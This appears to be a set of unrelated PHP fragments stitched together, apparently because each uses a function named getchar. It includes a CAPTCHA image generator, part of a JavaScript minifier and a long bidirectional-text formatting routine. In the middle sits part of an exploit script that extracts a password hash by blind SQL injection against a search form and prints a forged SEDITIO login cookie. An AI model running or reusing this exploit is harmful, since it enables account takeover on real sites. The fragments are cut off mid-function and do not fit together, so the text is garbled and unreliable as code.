function getcode($num = 4, $type = 0, $is_pix = 0)
{
//设置
//$num=4;//验证码长度
$str = getchar($num, $type);
$width = 20 * $num;
$height = 30;
define("ADD_PIX", $is_pix);
//是否添加干扰点和干扰线
$_SESSION['code'] = $str;
//创建画图板
$im = imagecreatetruecolor($width, $height);
//填充背景
$bg = imagecolorallocate($im, 255, 255, 255);
imagefill($im, 0, 0, $bg);
//添加字符串
for ($i = 0; $i < $num; $i++) {
$color = imagecolorallocate($im, rand(0, 255), rand(0, 255), rand(0, 255));
imagettftext($im, 18, rand(-35, 35), 5 + 18 * $i, 25, $color, "Vera.ttf", $str[$i]);
}
/*是否添加干扰线控制*/
if (ADD_PIX) {
//添加像素点
for ($i = 0; $i < 60; $i++) {
$color = imagecolorallocate($im, rand(0, 255), rand(0, 255), rand(0, 255));
imagesetpixel($im, rand(0, $width), rand(0, $height), $color);
}
//添加干扰线
for ($i = 0; $i < 2; $i++) {
$color = imagecolorallocate($im, rand(0, 255), rand(0, 255), rand(0, 255));
imageline($im, rand(0, $width), rand(0, $height), rand(0, $width), rand(0, $height), $color);
}
//添加一个矩形框
$color = imagecolorallocate($im, rand(0, 255), rand(0, 255), rand(0, 255));
imagerectangle($im, 0, 0, $width - 1, $height - 1, $color);
}
//生成图片
header("content-type:image/jpeg");
imagejpeg($im);
//释放图片
imagedestroy($im);
}
* javascript code in order to make it run a little faster.
*
* @author Peter Fokker <*****@*****.**>
* @copyright Copyright (C) 2008-2013 Ingenieursbureau PSD/Peter Fokker
* @license http://websiteatschool.eu/license.html GNU AGPLv3+Additional Terms
* @version $Id: minjs.php,v 1.1 2013/06/12 14:00:24 pfokker Exp $
*/
$c = '';
$comment = FALSE;
$slash = FALSE;
$slashslash = FALSE;
$asterisk = FALSE;
$line = '';
$quoted = FALSE;
$quote = '';
while (($c = getchar()) !== FALSE) {
if ($quoted) {
if ($backslash) {
$line .= $c;
$backslash = FALSE;
} elseif ($c == '\\') {
$line .= $c;
$backslash = TRUE;
} elseif ($c == $quote) {
$line .= $c;
$quoted = FALSE;
$backslash = FALSE;
} else {
$line .= $c;
}
} else {
print "OK\n";
} else {
die("\n[-] Exploit failed\n");
}
print " Getting hash...";
$hash = '';
for ($i = 1; $i <= 32; $i++) {
if (!getchar(">57", $i)) {
$min = 48;
$max = 57;
} else {
$min = 97;
$max = 102;
}
for ($j = $min; $j <= $max; $j++) {
if (getchar("+LIKE+{$j}", $i)) {
$hash .= chr($j);
break;
}
}
}
print "[+] Done! hash - {$hash}\n";
print "[+] Cookie to log in: \nSEDITIO=" . base64_encode($id . ":_:" . $hash . ":_:ice") . "\n";
function getchar($query, $pos, $status = true)
{
global $host, $path, $prefix, $id;
if ($status) {
status();
}
$data = "sq=InATeam&frm_sub%5B%5D=9999&sea_frmtitle=1&sea_frmtext=1&sea_pagtitle=1";
$data .= "&sea_pagdesc=1&sea_pagtext=1&searchin_pag=1&pag_sub%5B%5D=qwerty')";
/**
* Finish current span
*/
function finishCurrentSpan(&$result, $theEnd = false)
{
global $previousState, $currentState, $posSpanStart, $TEXT_DIRECTION, $waitingText;
global $startLTR, $endLTR, $startRTL, $endRTL, $lenStart, $lenEnd;
global $numbers, $punctuation;
$textSpan = substr($result, $posSpanStart);
$result = substr($result, 0, $posSpanStart);
// Get rid of empty spans, so that our check for presence of RTL will work
$result = str_replace(array($startLTR . $endLTR, $startRTL . $endRTL), '', $result);
// Look for numeric strings that are times (hh:mm:ss). These have to be separated from surrounding numbers.
$tempResult = '';
while ($textSpan != '') {
$posColon = strpos($textSpan, ':');
if ($posColon === false) {
break;
}
// No more possible time strings
$posLRE = strpos($textSpan, WT_UTF8_LRE);
if ($posLRE === false) {
break;
}
// No more numeric strings
$posPDF = strpos($textSpan, WT_UTF8_PDF, $posLRE);
if ($posPDF === false) {
break;
}
// No more numeric strings
$tempResult .= substr($textSpan, 0, $posLRE + 3);
// Copy everything preceding the numeric string
$numericString = substr($textSpan, $posLRE + 3, $posPDF - $posLRE);
// Separate the entire numeric string
$textSpan = substr($textSpan, $posPDF + 3);
$posColon = strpos($numericString, ':');
if ($posColon === false) {
// Nothing that looks like a time here
$tempResult .= $numericString;
continue;
}
$posBlank = strpos($numericString . ' ', ' ');
$posNbsp = strpos($numericString . ' ', ' ');
if ($posBlank < $posNbsp) {
$posSeparator = $posBlank;
$lengthSeparator = 1;
} else {
$posSeparator = $posNbsp;
$lengthSeparator = 6;
}
if ($posColon > $posSeparator) {
// We have a time string preceded by a blank: Exclude that blank from the numeric string
$tempResult .= substr($numericString, 0, $posSeparator);
$tempResult .= WT_UTF8_PDF;
$tempResult .= substr($numericString, $posSeparator, $lengthSeparator);
$tempResult .= WT_UTF8_LRE;
$numericString = substr($numericString, $posSeparator + $lengthSeparator);
}
$posBlank = strpos($numericString, ' ');
$posNbsp = strpos($numericString, ' ');
if ($posBlank === false && $posNbsp === false) {
// The time string isn't followed by a blank
$textSpan = $numericString . $textSpan;
continue;
}
// We have a time string followed by a blank: Exclude that blank from the numeric string
if ($posBlank === false) {
$posSeparator = $posNbsp;
$lengthSeparator = 6;
} else {
if ($posNbsp === false) {
$posSeparator = $posBlank;
$lengthSeparator = 1;
} else {
if ($posBlank < $posNbsp) {
$posSeparator = $posBlank;
$lengthSeparator = 1;
} else {
$posSeparator = $posNbsp;
$lengthSeparator = 6;
}
}
}
$tempResult .= substr($numericString, 0, $posSeparator);
$tempResult .= WT_UTF8_PDF;
$tempResult .= substr($numericString, $posSeparator, $lengthSeparator);
$posSeparator += $lengthSeparator;
$numericString = substr($numericString, $posSeparator);
$textSpan = WT_UTF8_LRE . $numericString . $textSpan;
}
$textSpan = $tempResult . $textSpan;
$trailingBlanks = '';
$trailingBreaks = '';
/* ****************************** LTR text handling ******************************** */
if ($currentState == 'LTR') {
// Move trailing numeric strings to the following RTL text. Include any blanks preceding or following the numeric text too.
if ($TEXT_DIRECTION == 'rtl' && $previousState == 'RTL' && !$theEnd) {
$trailingString = '';
$savedSpan = $textSpan;
while ($textSpan != '') {
// Look for trailing spaces and tentatively move them
if (substr($textSpan, -1) == ' ') {
$trailingString = ' ' . $trailingString;
$textSpan = substr($textSpan, 0, -1);
continue;
}
if (substr($textSpan, -6) == ' ') {
$trailingString = ' ' . $trailingString;
$textSpan = substr($textSpan, 0, -1);
continue;
}
if (substr($textSpan, -3) != WT_UTF8_PDF) {
// There is no trailing numeric string
$textSpan = $savedSpan;
break;
}
// We have a numeric string
$posStartNumber = strrpos($textSpan, WT_UTF8_LRE);
if ($posStartNumber === false) {
$posStartNumber = 0;
}
$trailingString = substr($textSpan, $posStartNumber, strlen($textSpan) - $posStartNumber) . $trailingString;
$textSpan = substr($textSpan, 0, $posStartNumber);
// Look for more spaces and move them too
while ($textSpan != '') {
if (substr($textSpan, -1) == ' ') {
$trailingString = ' ' . $trailingString;
$textSpan = substr($textSpan, 0, -1);
continue;
}
if (substr($textSpan, -6) == ' ') {
$trailingString = ' ' . $trailingString;
$textSpan = substr($textSpan, 0, -1);
continue;
}
break;
}
$waitingText = $trailingString . $waitingText;
break;
}
}
$savedSpan = $textSpan;
// Move any trailing <br>, optionally preceded or followed by blanks, outside this LTR span
while ($textSpan != '') {
if (substr($textSpan, -1) == ' ') {
$trailingBlanks = ' ' . $trailingBlanks;
$textSpan = substr($textSpan, 0, -1);
continue;
}
if (substr('......' . $textSpan, -6) == ' ') {
$trailingBlanks = ' ' . $trailingBlanks;
$textSpan = substr($textSpan, 0, -6);
continue;
}
break;
}
while (substr($textSpan, -9) == '<LTRbr>') {
$trailingBreaks = '<br>' . $trailingBreaks;
// Plain <br> because it’s outside a span
$textSpan = substr($textSpan, 0, -9);
}
if ($trailingBreaks != '') {
while ($textSpan != '') {
if (substr($textSpan, -1) == ' ') {
$trailingBreaks = ' ' . $trailingBreaks;
$textSpan = substr($textSpan, 0, -1);
continue;
}
if (substr('......' . $textSpan, -6) == ' ') {
$trailingBreaks = ' ' . $trailingBreaks;
$textSpan = substr($textSpan, 0, -6);
continue;
}
break;
}
$waitingText = $trailingBlanks . $waitingText;
// Put those trailing blanks inside the following span
} else {
$textSpan = $savedSpan;
}
$savedSpan = $textSpan;
$trailingBlanks = '';
$trailingPunctuation = '';
$trailingID = '';
$trailingSeparator = '';
$leadingSeparator = '';
while ($TEXT_DIRECTION == 'rtl') {
if (strpos($result, $startRTL) !== false) {
// Remove trailing blanks for inclusion in a separate LTR span
while ($textSpan != '') {
if (substr($textSpan, -1) == ' ') {
$trailingBlanks = ' ' . $trailingBlanks;
$textSpan = substr($textSpan, 0, -1);
continue;
}
if (substr($textSpan, -6) == ' ') {
$trailingBlanks = ' ' . $trailingBlanks;
$textSpan = substr($textSpan, 0, -1);
continue;
}
break;
}
// Remove trailing punctuation for inclusion in a separate LTR span
if ($textSpan == '') {
$trailingChar = "\n";
} else {
$trailingChar = substr($textSpan, -1);
}
if (strpos($punctuation, $trailingChar) !== false) {
$trailingPunctuation = $trailingChar;
$textSpan = substr($textSpan, 0, -1);
}
}
// Remove trailing ID numbers that look like "(xnnn)" for inclusion in a separate LTR span
while (true) {
if (substr($textSpan, -1) != ')') {
break;
}
// There is no trailing ')'
$posLeftParen = strrpos($textSpan, '(');
if ($posLeftParen === false) {
break;
}
// There is no leading '('
$temp = stripLRMRLM(substr($textSpan, $posLeftParen));
// Get rid of UTF8 control codes
// If the parenthesized text doesn't look like an ID number,
// we don't want to touch it.
// This check won’t work if somebody uses ID numbers with an unusual format.
$offset = 1;
$charArray = getchar($temp, $offset);
// Get 1st character of parenthesized text
if (strpos($numbers, $charArray['letter']) !== false) {
break;
}
$offset += $charArray['length'];
// Point at 2nd character of parenthesized text
if (strpos($numbers, substr($temp, $offset, 1)) === false) {
break;
}
// 1st character of parenthesized text is alpha, 2nd character is a digit; last has to be a digit too
if (strpos($numbers, substr($temp, -2, 1)) === false) {
break;
}
$trailingID = substr($textSpan, $posLeftParen);
$textSpan = substr($textSpan, 0, $posLeftParen);
break;
}
// Look for " - " or blank preceding the ID number and remove it for inclusion in a separate LTR span
$savedSpan = $textSpan;
if ($trailingID != '') {
while ($textSpan != '') {
if (substr($textSpan, -1) == ' ') {
$trailingSeparator = ' ' . $trailingSeparator;
$textSpan = substr($textSpan, 0, -1);
continue;
}
if (substr($textSpan, -6) == ' ') {
$trailingSeparator = ' ' . $trailingSeparator;
$textSpan = substr($textSpan, 0, -6);
continue;
}
if (substr($textSpan, -1) == '-') {
$trailingSeparator = '-' . $trailingSeparator;
$textSpan = substr($textSpan, 0, -1);
continue;
}
break;
}
}
// Look for " - " preceding the text and remove it for inclusion in a separate LTR span
$foundSeparator = false;
$savedSpan = $textSpan;
while ($textSpan != '') {
if (substr($textSpan, 0, 1) == ' ') {
$leadingSeparator = ' ' . $leadingSeparator;
$textSpan = substr($textSpan, 1);
continue;
}
if (substr($textSpan, 0, 6) == ' ') {
$leadingSeparator = ' ' . $leadingSeparator;
$textSpan = substr($textSpan, 6);
continue;
}
if (substr($textSpan, 0, 1) == '-') {
$leadingSeparator = '-' . $leadingSeparator;
$textSpan = substr($textSpan, 1);
$foundSeparator = true;
continue;
}
break;
}
if (!$foundSeparator) {
$textSpan = $savedSpan;
$leadingSeparator = '';
}
break;
}
// We're done: finish the span
$textSpan = starredName($textSpan, 'LTR');
// Wrap starred name in <u> and </u> tags
while (true) {
// Remove blanks that precede <LTRbr>
if (strpos($textSpan, ' <LTRbr>') !== false) {
$textSpan = str_replace(' <LTRbr>', '<LTRbr>', $textSpan);
continue;
}
if (strpos($textSpan, ' <LTRbr>') !== false) {
$textSpan = str_replace(' <LTRbr>', '<LTRbr>', $textSpan);
continue;
}
break;
}
if ($leadingSeparator != '') {
$result = $result . $startLTR . $leadingSeparator . $endLTR;
}
$result = $result . $textSpan . $endLTR;
if ($trailingSeparator != '') {
$result = $result . $startLTR . $trailingSeparator . $endLTR;
}
if ($trailingID != '') {
$result = $result . $startLTR . $trailingID . $endLTR;
}
if ($trailingPunctuation != '') {
$result = $result . $startLTR . $trailingPunctuation . $endLTR;
}
if ($trailingBlanks != '') {
$result = $result . $startLTR . $trailingBlanks . $endLTR;
}
}
/* ****************************** RTL text handling ******************************** */
if ($currentState == 'RTL') {
$savedSpan = $textSpan;
// Move any trailing <br>, optionally followed by blanks, outside this RTL span
while ($textSpan != '') {
if (substr($textSpan, -1) == ' ') {
$trailingBlanks = ' ' . $trailingBlanks;
$textSpan = substr($textSpan, 0, -1);
continue;
}
if (substr('......' . $textSpan, -6) == ' ') {
$trailingBlanks = ' ' . $trailingBlanks;
$textSpan = substr($textSpan, 0, -6);
continue;
}
break;
}
while (substr($textSpan, -9) == '<RTLbr>') {
$trailingBreaks = '<br>' . $trailingBreaks;
// Plain <br> because it’s outside a span
$textSpan = substr($textSpan, 0, -9);
}
if ($trailingBreaks != '') {
$waitingText = $trailingBlanks . $waitingText;
// Put those trailing blanks inside the following span
} else {
$textSpan = $savedSpan;
}
// Move trailing numeric strings to the following LTR text. Include any blanks preceding or following the numeric text too.
if (!$theEnd && $TEXT_DIRECTION != 'rtl') {
$trailingString = '';
$savedSpan = $textSpan;
while ($textSpan != '') {
// Look for trailing spaces and tentatively move them
if (substr($textSpan, -1) == ' ') {
$trailingString = ' ' . $trailingString;
$textSpan = substr($textSpan, 0, -1);
continue;
}
if (substr($textSpan, -6) == ' ') {
$trailingString = ' ' . $trailingString;
$textSpan = substr($textSpan, 0, -1);
continue;
}
if (substr($textSpan, -3) != WT_UTF8_PDF) {
// There is no trailing numeric string
$textSpan = $savedSpan;
break;
}
// We have a numeric string
$posStartNumber = strrpos($textSpan, WT_UTF8_LRE);
if ($posStartNumber === false) {
$posStartNumber = 0;
}
$trailingString = substr($textSpan, $posStartNumber, strlen($textSpan) - $posStartNumber) . $trailingString;
$textSpan = substr($textSpan, 0, $posStartNumber);
// Look for more spaces and move them too
while ($textSpan != '') {
if (substr($textSpan, -1) == ' ') {
$trailingString = ' ' . $trailingString;
$textSpan = substr($textSpan, 0, -1);
continue;
}
if (substr($textSpan, -6) == ' ') {
$trailingString = ' ' . $trailingString;
$textSpan = substr($textSpan, 0, -1);
continue;
}
break;
}
$waitingText = $trailingString . $waitingText;
break;
}
}
// Trailing " - " needs to be prefixed to the following span
if (!$theEnd && substr('...' . $textSpan, -3) == ' - ') {
$textSpan = substr($textSpan, 0, -3);
$waitingText = ' - ' . $waitingText;
}
while ($TEXT_DIRECTION == 'rtl') {
// Look for " - " preceding <RTLbr> and relocate it to the front of the string
$posDashString = strpos($textSpan, ' - <RTLbr>');
if ($posDashString === false) {
break;
}
$posStringStart = strrpos(substr($textSpan, 0, $posDashString), '<RTLbr>');
if ($posStringStart === false) {
$posStringStart = 0;
} else {
$posStringStart += 9;
}
// Point to the first char following the last <RTLbr>
$textSpan = substr($textSpan, 0, $posStringStart) . ' - ' . substr($textSpan, $posStringStart, $posDashString - $posStringStart) . substr($textSpan, $posDashString + 3);
}
// Strip leading spaces from the RTL text
$countLeadingSpaces = 0;
while ($textSpan != '') {
if (substr($textSpan, 0, 1) == ' ') {
$countLeadingSpaces++;
$textSpan = substr($textSpan, 1);
continue;
}
if (substr($textSpan, 0, 6) == ' ') {
$countLeadingSpaces++;
$textSpan = substr($textSpan, 6);
continue;
}
break;
}
// Strip trailing spaces from the RTL text
$countTrailingSpaces = 0;
while ($textSpan != '') {
if (substr($textSpan, -1) == ' ') {
$countTrailingSpaces++;
$textSpan = substr($textSpan, 0, -1);
continue;
}
if (substr($textSpan, -6) == ' ') {
$countTrailingSpaces++;
$textSpan = substr($textSpan, 0, -6);
continue;
}
break;
}
// Look for trailing " -", reverse it, and relocate it to the front of the string
if (substr($textSpan, -2) == ' -') {
$posDashString = strlen($textSpan) - 2;
$posStringStart = strrpos(substr($textSpan, 0, $posDashString), '<RTLbr>');
if ($posStringStart === false) {
$posStringStart = 0;
} else {
$posStringStart += 9;
}
// Point to the first char following the last <RTLbr>
$textSpan = substr($textSpan, 0, $posStringStart) . '- ' . substr($textSpan, $posStringStart, $posDashString - $posStringStart) . substr($textSpan, $posDashString + 2);
}
if ($countLeadingSpaces != 0) {
$newLength = strlen($textSpan) + $countLeadingSpaces;
$textSpan = str_pad($textSpan, $newLength, ' ', $TEXT_DIRECTION == 'rtl' ? STR_PAD_LEFT : STR_PAD_RIGHT);
}
if ($countTrailingSpaces != 0) {
if ($TEXT_DIRECTION == 'ltr') {
if ($trailingBreaks == '') {
// Move trailing RTL spaces to front of following LTR span
$newLength = strlen($waitingText) + $countTrailingSpaces;
$waitingText = str_pad($waitingText, $newLength, ' ', STR_PAD_LEFT);
}
} else {
$newLength = strlen($textSpan) + $countTrailingSpaces;
$textSpan = str_pad($textSpan, $newLength, ' ', STR_PAD_RIGHT);
}
}
// We're done: finish the span
$textSpan = starredName($textSpan, 'RTL');
// Wrap starred name in <u> and </u> tags
$result = $result . $textSpan . $endRTL;
}
if ($currentState != 'LTR' && $currentState != 'RTL') {
$result = $result . $textSpan;
}
$result .= $trailingBreaks;
// Get rid of any waiting <br>
return;
}